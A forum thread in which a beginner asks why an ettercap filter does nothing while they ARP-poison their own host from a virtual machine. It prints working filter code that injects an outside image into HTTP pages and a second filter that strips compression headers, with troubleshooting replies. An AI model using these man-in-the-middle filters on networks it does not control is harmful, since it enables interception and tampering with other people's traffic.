myhat Posted July 23, 2017 Share Posted July 23, 2017 Noob here. Been trying to run some ettercap filters through my virtual machine while ARP-poisoning my host computer. Quote Link to comment Share on other sites More sharing options...
myhat Posted July 23, 2017 Author Share Posted July 23, 2017 Here is the filter I'm using: if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.cranklin.com/mickey.png\" "); replace("IMG SRC=", "img src=\"http://www.cranklin.com/mickey.png\" "); msg("Filter Ran.\n"); } Everything seems to be working fine and no errors are popping up but when I go onto the internet on my host computer nothing seems to change. Quote Link to comment Share on other sites More sharing options...
myhat Posted July 23, 2017 Author Share Posted July 23, 2017 Followed the instructions on this site perfectly: https://cranklin.wordpress.com/2011/10/13/prank-hacking-your-co-workers-for-fun-2/ Quote Link to comment Share on other sites More sharing options...
i8igmac Posted July 23, 2017 Share Posted July 23, 2017 all your traffic is gzip encoded, your filter must first prevent this so plain text traffic is visible to ettetcap. https://www.irongeek.com/i.php?page=security/ettercapfilter Quote Link to comment Share on other sites More sharing options...
myhat Posted July 23, 2017 Author Share Posted July 23, 2017 Thank you for the response but if you're referring to including this line of code if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } I got the same results. Perhaps I should include more details. I'm running Kali, My ettercap is version 0.8.2, ip_forwarding is set to 1 and ettercap, when I run this code, tells me the filter has run however, no changes occur to the target computer. Any ideas on what the problem could be? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted July 23, 2017 Share Posted July 23, 2017 (edited) If the traffic is encrypted with ssl or hsts it wont work. Try using internet explorer and try multiple websites that are not encrypted. Ip forwarding like this? echo 1 > /proc/sys/net/ipv4/ip_forward Edited July 23, 2017 by i8igmac Quote Link to comment Share on other sites More sharing options...
myhat Posted July 25, 2017 Author Share Posted July 25, 2017 Yeah, tried it on multiple http websites and with internet explorer. I used nano /proc/sys/net/ipv4/ip_forward and changed it manually but that doesn't make a difference. Thanks again for the response though Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.